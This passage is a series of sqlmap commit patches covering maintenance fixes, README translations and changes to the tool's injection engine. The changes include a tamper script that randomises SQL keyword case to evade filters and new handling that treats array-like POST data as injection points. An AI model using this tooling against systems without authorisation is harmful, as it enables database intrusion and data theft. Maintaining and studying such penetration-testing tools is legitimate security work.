 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/COPYING b/doc/COPYING
index 38a61d291..a8ccaaa4d 100644
--- a/doc/COPYING
+++ b/doc/COPYING
@@ -1,7 +1,7 @@
 COPYING -- Describes the terms under which sqlmap is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.
 
-sqlmap is (C) 2006-2013 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2014 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
 
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free

From 2de12ef4a276cc83f4dcc8c2c815a4b7d1a68858 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 5 Oct 2014 00:20:42 +0200
Subject: [PATCH 049/492] Potential fix for an Issue #843

---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index fbab89ca3..405a0f026 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -34,7 +34,7 @@ BANNER = """\033[01;33m         _
  ___ ___| |_____ ___ ___  \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
 |_ -| . | |     | .'| . |
 |___|_  |_|_|_|_|__,|  _|
-      |_|           |_|   \033[0m\033[4m%s\033[0m\n
+      |_|           |_|   \033[0m\033[4;37m%s\033[0m\n
 """ % ((31 + hash(REVISION) % 6) if REVISION else 30, VERSION_STRING.split('/')[-1], SITE)
 
 # Minimum distance of ratio from kb.matchRatio to result in True

From 9d25389ef039f4f03eb41b16750253c0f6de55df Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 7 Oct 2014 10:20:40 +0200
Subject: [PATCH 050/492] Minor fix regarding Issue #845

---
 doc/THIRD-PARTY.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/THIRD-PARTY.md b/doc/THIRD-PARTY.md
index 5debfe274..1e73d3827 100644
--- a/doc/THIRD-PARTY.md
+++ b/doc/THIRD-PARTY.md
@@ -55,7 +55,7 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
   Copyright (C) 2008-2009, Jose Fonseca.
 * The KeepAlive library located under thirdparty/keepalive/.
   Copyright (C) 2002-2003, Michael D. Stenner.
-* The MultipartPost library located under thirdparty/multipartpost/.
+* The MultipartPost library located under thirdparty/multipart/.
   Copyright (C) 2006, Will Holcomb.
 * The XDot library located under thirdparty/xdot/.
   Copyright (C) 2008, Jose Fonseca.

From 2f37fb295b9f03a019985e4ed3eb30c517968eb1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 7 Oct 2014 10:31:17 +0200
Subject: [PATCH 051/492] Minor fix regarding Issue #845

---
 doc/THIRD-PARTY.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/doc/THIRD-PARTY.md b/doc/THIRD-PARTY.md
index 1e73d3827..f2479b31a 100644
--- a/doc/THIRD-PARTY.md
+++ b/doc/THIRD-PARTY.md
@@ -20,6 +20,8 @@ This file lists bundled packages and their associated licensing terms.
 * The Oset library located under thirdparty/oset/.
   Copyright (C) 2010, BlueDynamics Alliance, Austria.
   Copyright (C) 2009, Raymond Hettinger, and others.
+* The PrettyPrint library located under thirdparty/prettyprint/.
+  Copyright (C) 2010, Chris Hall.
 * The SocksiPy library located under thirdparty/socks/.
   Copyright (C) 2006, Dan-Haim.
 
@@ -281,8 +283,6 @@ be bound by the terms and conditions of this License Agreement.
   Copyright (C) 2012, Marcel Hellkamp.
 * The PageRank library located under thirdparty/pagerank/.
   Copyright (C) 2010, Corey Goldberg.
-* The PrettyPrint library located under thirdparty/prettyprint/.
-  Copyright (C) 2010, Chris Hall.
 * The Termcolor library located under thirdparty/termcolor/.
   Copyright (C) 2008-2011, Volvox Development Team.
 

From ddfec1c668163e23b03221243095f6c771189625 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 7 Oct 2014 11:34:47 +0200
Subject: [PATCH 052/492] Initial patch for an Issue #846

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 12e4ac9e9..9c197305e 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1542,7 +1542,7 @@ def safeStringFormat(format_, params):
             while True:
                 match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal)
                 if match:
-                    if count > len(params):
+                    if count >= len(params):
                         raise Exception("wrong number of parameters during string formatting")
                     else:
                         retVal = re.sub(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>" % params[count], retVal, 1)

From 2ab455885921c30347d798c5f0af92361eeaac37 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 7 Oct 2014 11:49:53 +0200
Subject: [PATCH 053/492] Potential fix for an Issue #846

---
 lib/core/common.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 9c197305e..44806295d 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1520,10 +1520,10 @@ def safeStringFormat(format_, params):
 
     if format_.count(PAYLOAD_DELIMITER) == 2:
         _ = format_.split(PAYLOAD_DELIMITER)
-        _[1] = _[1].replace("%d", "%s")
+        _[1] = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", _[1])
         retVal = PAYLOAD_DELIMITER.join(_)
     else:
-        retVal = format_.replace("%d", "%s")
+        retVal = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", format_)
 
     if isinstance(params, basestring):
         retVal = retVal.replace("%s", params, 1)

From c6a8feea8a7ef2652cc673e2d2d6cddf27ea991b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 7 Oct 2014 12:00:11 +0200
Subject: [PATCH 054/492] Fix for an Issue #831

---
 lib/controller/checks.py | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index e4429dfd7..fa118f556 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -85,7 +85,11 @@ def checkSqlInjection(place, parameter, value):
     # Set the flag for SQL injection test mode
     kb.testMode = True
 
-    for test in getSortedInjectionTests():
+    tests = getSortedInjectionTests()
+
+    while tests:
+        test = tests.pop(0)
+
         try:
             if kb.endDetection:
                 break
@@ -597,6 +601,7 @@ def checkSqlInjection(place, parameter, value):
                     choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip()
                 conf.verbose = int(choice)
                 setVerbosity()
+                tests.insert(0, test)
             elif choice[0] in ("n", "N"):
                 return None
             elif choice[0] in ("e", "E"):

From 70215a95a1f2ce7e2051139369a5239723a18cc6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 7 Oct 2014 13:02:47 +0200
Subject: [PATCH 055/492] Patch for an Issue #847

---
 lib/core/common.py | 7 ++-----
 1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 44806295d..9b8f21045 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2809,14 +2809,11 @@ def decodeIntToUnicode(value):
 
     if isinstance(value, int):
         try:
-            # http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_ord
-            if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
+            if value > 255:
                 _ = "%x" % value
                 if len(_) % 2 == 1:
                     _ = "0%s" % _
-                retVal = getUnicode(hexdecode(_))
-            elif value > 255:
-                retVal = unichr(value)
+                retVal = getUnicode(hexdecode(_), encoding="UTF-16" if Backend.isDbms(DBMS.MSSQL) else None)
             else:
                 retVal = getUnicode(chr(value))
         except:

From 35ed668a85244117b9ab42514e500e13394278ca Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 7 Oct 2014 13:09:37 +0200
Subject: [PATCH 056/492] Minor improvement of the randomcase tamper script

---
 tamper/randomcase.py | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/tamper/randomcase.py b/tamper/randomcase.py
index 6f0a0a65e..3e7a60caa 100644
--- a/tamper/randomcase.py
+++ b/tamper/randomcase.py
@@ -44,10 +44,14 @@ def tamper(payload, **kwargs):
             word = match.group()
 
             if word.upper() in kb.keywords:
-                _ = str()
+                while True:
+                    _ = ""
 
-                for i in xrange(len(word)):
-                    _ += word[i].upper() if randomRange(0, 1) else word[i].lower()
+                    for i in xrange(len(word)):
+                        _ += word[i].upper() if randomRange(0, 1) else word[i].lower()
+
+                    if len(_) > 1 and _ not in (_.lower(), _.upper()):
+                        break
 
                 retVal = retVal.replace(word, _)
 

From c823c58d47f87dafa87d8fb8cd69dee11a067bd7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 9 Oct 2014 14:39:54 +0200
Subject: [PATCH 057/492] One patch related to the Issue #846

---
 lib/core/agent.py | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 2df03da44..b8abc5567 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -32,6 +32,8 @@ from lib.core.enums import PLACE
 from lib.core.enums import POST_HINT
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
+from lib.core.settings import DEFAULT_COOKIE_DELIMITER
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import GENERIC_SQL_COMMENT
 from lib.core.settings import PAYLOAD_DELIMITER
 from lib.core.settings import REPLACEMENT_MARKER
@@ -156,7 +158,10 @@ class Agent(object):
         elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
             retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
         else:
-            retVal = re.sub(r"(\A|\b)%s=%s" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+            if origValue:
+                retVal = re.sub(r"(\A|\b)%s=%s(\Z|\b)" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+            else:
+                retVal = re.sub(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
             if retVal == paramString and urlencode(parameter) != parameter:
                 retVal = re.sub(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
 

From f94ac8c69d47651f74cc8ae6d7858979d110f0a4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 9 Oct 2014 15:21:26 +0200
Subject: [PATCH 058/492] Second patch related to the Issue #846

---
 lib/core/enums.py    |  1 +
 lib/core/settings.py |  3 +++
 lib/core/target.py   | 13 +++++++++++++
 3 files changed, 17 insertions(+)

diff --git a/lib/core/enums.py b/lib/core/enums.py
index b4f8b809f..80cab9474 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -74,6 +74,7 @@ class POST_HINT:
     JSON_LIKE = "JSON-like"
     MULTIPART = "MULTIPART"
     XML = "XML (generic)"
+    ARRAY_LIKE = "Array-like"
 
 class HTTPMETHOD:
     GET = "GET"
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 405a0f026..887009543 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -573,6 +573,9 @@ JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+)
 # Regular expression used for detecting multipart POST data
 MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
 
+# Regular expression used for detecting Array-like POST data
+ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)
+
 # Default POST data content-type
 DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
 
diff --git a/lib/core/target.py b/lib/core/target.py
index 8f0be26ac..1daf63060 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -44,7 +44,9 @@ from lib.core.option import _setKnowledgeBaseAttributes
 from lib.core.option import _setAuthCred
 from lib.core.settings import ASTERISK_MARKER
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import HOST_ALIASES
+from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
 from lib.core.settings import JSON_RECOGNITION_REGEX
 from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
 from lib.core.settings import MULTIPART_RECOGNITION_REGEX
@@ -146,6 +148,17 @@ def _setRequestParams():
                     conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
                     kb.postHint = POST_HINT.JSON_LIKE
 
+            elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
+                message = "Array-like data found in %s data. " % conf.method
+                message += "Do you want to process it? [Y/n/q] "
+                test = readInput(message, default="Y")
+                if test and test[0] in ("q", "Q"):
+                    raise SqlmapUserQuitException
+                elif test[0] not in ("n", "N"):
+                    conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
+                    conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
+                    kb.postHint = POST_HINT.ARRAY_LIKE
+
             elif re.search(XML_RECOGNITION_REGEX, conf.data):
                 message = "SOAP/XML data found in %s data. " % conf.method
                 message += "Do you want to process it? [Y/n/q] "

From 7811a958ae03f070b69970bbd2905eeff55029d1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 9 Oct 2014 15:42:44 +0200
Subject: [PATCH 059/492] Another minor patch for Issue #846

---
 lib/core/dicts.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/core/dicts.py b/lib/core/dicts.py
index c9cd0cd51..0a3d7dabe 100644
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@@ -207,6 +207,7 @@ POST_HINT_CONTENT_TYPES = {
                                 POST_HINT.MULTIPART: "multipart/form-data",
                                 POST_HINT.SOAP: "application/soap+xml",
                                 POST_HINT.XML: "application/xml",
+                                POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
                           }
 
 DEPRECATED_OPTIONS = {

From d4610890caab74bbcd1b92672f4a0b0dbcfeb861 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 10 Oct 2014 10:07:17 +0200
Subject: [PATCH 060/492] Minor patch (flushing log file output at the end of
 program run)

---
 lib/core/dump.py | 7 +++++++
 sqlmap.py        | 3 +++
 2 files changed, 10 insertions(+)

diff --git a/lib/core/dump.py b/lib/core/dump.py
index ba3123ba9..4e1a06410 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -73,6 +73,13 @@ class Dump(object):
 
         kb.dataOutputFlag = True
 
+    def flush(self):
+        if self._outputFP:
+            try:
+                self._outputFP.flush()
+            except IOError:
+                pass
+
     def setOutputFile(self):
         self._outputFile = os.path.join(conf.outputPath, "log")
         try:
diff --git a/sqlmap.py b/sqlmap.py
index 1607a0648..5807b341f 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -156,6 +156,9 @@ def main():
             except KeyboardInterrupt:
                 pass
 
+        if conf.get("dumper"):
+            conf.dumper.flush()
+
         # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
         if conf.get("threads", 0) > 1 or conf.get("dnsServer"):
             os._exit(0)

From 2aadfc0fd3ef26a19a68cd3feb7c875270b6f912 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 10 Oct 2014 10:38:17 +0200
Subject: [PATCH 061/492] Fix for an Issue #851

---
 lib/utils/api.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/utils/api.py b/lib/utils/api.py
index 7a22bb123..78a1f1a31 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -164,8 +164,8 @@ class Task(object):
             shutil.rmtree(self.output_directory)
 
     def engine_start(self):
-        self.process = Popen("python sqlmap.py --pickled-options %s" % base64pickle(self.options),
-                             shell=True, stdin=PIPE, close_fds=False)
+        self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)],
+                             shell=False, stdin=PIPE, close_fds=False)
 
     def engine_stop(self):
         if self.process:

From 4e3a4eb0ff12cdad671fdc0abfe2d59f5a85ce07 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 10 Oct 2014 12:09:08 +0200
Subject: [PATCH 062/492] Added a prompt for choosing a number of threads when
 in crawling mode

---
 lib/core/threads.py  | 6 +++---
 lib/utils/crawler.py | 5 +----
 2 files changed, 4 insertions(+), 7 deletions(-)

diff --git a/lib/core/threads.py b/lib/core/threads.py
index 8eb10f99c..2b4ce4eb4 100644
--- a/lib/core/threads.py
+++ b/lib/core/threads.py
@@ -106,7 +106,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
     kb.threadContinue = True
     kb.threadException = False
 
-    if threadChoice and numThreads == 1 and any(_ in kb.injection.data for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY, PAYLOAD.TECHNIQUE.UNION)):
+    if threadChoice and numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)):
         while True:
             message = "please enter number of threads? [Enter for %d (current)] " % numThreads
             choice = readInput(message, default=str(numThreads))
@@ -115,11 +115,11 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
                     errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
                     logger.critical(errMsg)
                 else:
-                    numThreads = int(choice)
+                    conf.threads = numThreads = int(choice)
                     break
 
         if numThreads == 1:
-            warnMsg = "running in a single-thread mode. This could take a while."
+            warnMsg = "running in a single-thread mode. This could take a while"
             logger.warn(warnMsg)
 
     try:
diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index 07860ff87..caea59a85 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -115,9 +115,6 @@ def crawl(target):
         logger.info(infoMsg)
 
         for i in xrange(conf.crawlDepth):
-            if i > 0 and conf.threads == 1:
-                singleTimeWarnMessage("running in a single-thread mode. This could take a while")
-
             threadData.shared.count = 0
             threadData.shared.length = len(threadData.shared.unprocessed)
             numThreads = min(conf.threads, len(threadData.shared.unprocessed))
@@ -125,7 +122,7 @@ def crawl(target):
             if not conf.bulkFile:
                 logger.info("searching for links with depth %d" % (i + 1))
 
-            runThreads(numThreads, crawlThread)
+            runThreads(numThreads, crawlThread, threadChoice=(i>0))
             clearConsoleLine(True)
 
             if threadData.shared.deeper:

From be213bc657cade85858cdd06248a0e37e87ee277 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 12 Oct 2014 22:41:53 +0200
Subject: [PATCH 063/492] Bug fix for crashes caused by '--search
 --exclude-sysdbs --current-db'

---
 plugins/generic/search.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/plugins/generic/search.py b/plugins/generic/search.py
index f38f7428b..6e9c2fe75 100644
--- a/plugins/generic/search.py
+++ b/plugins/generic/search.py
@@ -261,7 +261,7 @@ class Search:
                         if tblConsider == "2":
                             continue
                     else:
-                        for db in conf.db.split(","):
+                        for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),):
                             db = safeSQLIdentificatorNaming(db)
                             if db not in foundTbls:
                                 foundTbls[db] = []
@@ -501,7 +501,7 @@ class Search:
                         if db not in foundCols[column]:
                             foundCols[column][db] = []
                 else:
-                    for db in conf.db.split(","):
+                    for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),):
                         db = safeSQLIdentificatorNaming(db)
                         if db not in foundCols[column]:
                             foundCols[column][db] = []

From 6db4b29fd34bf7f246a4cd82f2646cd5c4dc250c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 13 Oct 2014 09:02:33 +0200
Subject: [PATCH 064/492] Adding contributed Greek and Chinese translations

---
 README.md                        |  4 ++-
 doc/THANKS.md                    |  6 ++++
 doc/translations/README-cn-CN.md | 58 +++++++++++++++++++++++++++++++
 doc/translations/README-gr-GR.md | 59 ++++++++++++++++++++++++++++++++
 4 files changed, 126 insertions(+), 1 deletion(-)
 create mode 100644 doc/translations/README-cn-CN.md
 create mode 100644 doc/translations/README-gr-GR.md

diff --git a/README.md b/README.md
index a620dc945..407ef70ee 100644
--- a/README.md
+++ b/README.md
@@ -55,5 +55,7 @@ Links
 Translations
 ----
 
-* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-cn-CN.md)
+* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
 * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
+* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
diff --git a/doc/THANKS.md b/doc/THANKS.md
index b56820891..97335723c 100644
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -660,6 +660,9 @@ fufuh, <fufuh(at)users.sourceforge.net>
 Hans Wurst, <wurstwass0r(at)googlemail.com>
 * for reporting a couple of bugs
 
+Hysia, <hysia(at)huorui.net>
+* for contributing a Chinese translation of README.md
+
 james, <james(at)ev6.net>
 * for reporting a bug
 
@@ -719,6 +722,9 @@ smith, <esmyl911(at)gmail.com>
 Soma Cruz, <oleg.kupreev(at)gmail.com>
 * for reporting a minor bug
 
+Spiros94, <cont(at)eyrhka.gr>
+* for contributing a Greek translation of README.md
+
 Stuffe, <stuffe.dk(at)gmail.com>
 * for reporting a minor bug and a feature request
 
diff --git a/doc/translations/README-cn-CN.md b/doc/translations/README-cn-CN.md
new file mode 100644
index 000000000..9080e7ad5
--- /dev/null
+++ b/doc/translations/README-cn-CN.md
@@ -0,0 +1,58 @@
+sqlmap
+==
+
+
+sqlmap 是一个开源的渗透测试工具，可以用来自动化的检测，利用SQL注入漏洞，获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项，包括获取数据库中存储的数据，访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
+
+演示截图
+----
+
+![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示
+
+安装方法
+----
+
+你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.
+
+推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap 可以运行在 [Python](http://www.python.org/download/)  **2.6.x**  和  **2.7.x** 版本的任何平台上
+
+使用方法
+----
+
+通过如下命令可以查看基本的用法及命令行参数:
+
+    python sqlmap.py -h
+
+通过如下的命令可以查看所有的用法及命令行参数:
+
+    python sqlmap.py -hh
+
+你可以从 [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外，你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
+
+链接
+----
+
+* 项目主页: http://sqlmap.org
+* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
+* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
+
+翻译
+----
+
+* [葡萄牙文](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [印度尼西亚文](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
diff --git a/doc/translations/README-gr-GR.md b/doc/translations/README-gr-GR.md
new file mode 100644
index 000000000..4d34e42db
--- /dev/null
+++ b/doc/translations/README-gr-GR.md
@@ -0,0 +1,59 @@
+sqlmap
+==
+
+
+Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
+
+Εικόνες
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Μπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά.
+
+Εγκατάσταση
+----
+
+Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.
+
+Χρήση
+----
+
+Για να δείτε μια βασική λίστα από επιλογές πατήστε:
+
+    python sqlmap.py -h
+
+Για να πάρετε μια λίστα από όλες τις επιλογές πατήστε:
+
+    python sqlmap.py -hh
+
+Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://gist.github.com/stamparm/5335217).
+Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Σύνδεσμοι
+----
+
+* Αρχική σελίδα: http://sqlmap.org
+* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
+* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
+* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap
